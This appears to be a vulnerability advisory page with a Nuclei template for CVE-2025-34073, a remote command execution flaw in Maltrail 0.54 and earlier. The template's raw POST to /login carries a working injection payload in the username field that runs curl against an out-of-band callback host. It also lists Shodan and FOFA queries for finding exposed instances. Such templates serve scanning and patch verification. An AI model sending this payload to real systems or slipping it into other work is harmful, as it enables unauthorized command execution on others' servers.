漏洞描述
Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
CVE-2025-34073: Maltrail <=0.54 Username Parameter - Remote Command Execution
PoC代码[已公开]
id: CVE-2025-34073
info:
name: Maltrail <=0.54 Username Parameter - Remote Command Execution
author: SeungAh-Hong
severity: critical
description: |
Maltrail versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint.
reference:
- https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87
- https://vulncheck.com/advisories/stamparm-maltrail-rce
- https://github.com/stamparm/maltrail/issues/19146
- https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/http/maltrail_rce.rb
metadata:
max-request: 1
shodan-query: http.title:"Maltrail"
fofa-query: app="Maltrail"
tags: cve,cve2025,maltrail,rce,unauth,oss,vuln
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=;`curl http://{{interactsh-url}}`
matchers:
- type: dsl
dsl:
- 'contains(header, "Maltrail")'
- "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
condition: and
# digest: 4a0a00473045022100e7e0e3c26e7c87836f3d0382274d16bec58fd64019a37202d47efe3c1c7ae0a502200484d1948fdcebd1e683ffd61ca84c95de0333c982c14014bb51e8c29b563de7:922c64590222798bb761d5b6d8e72950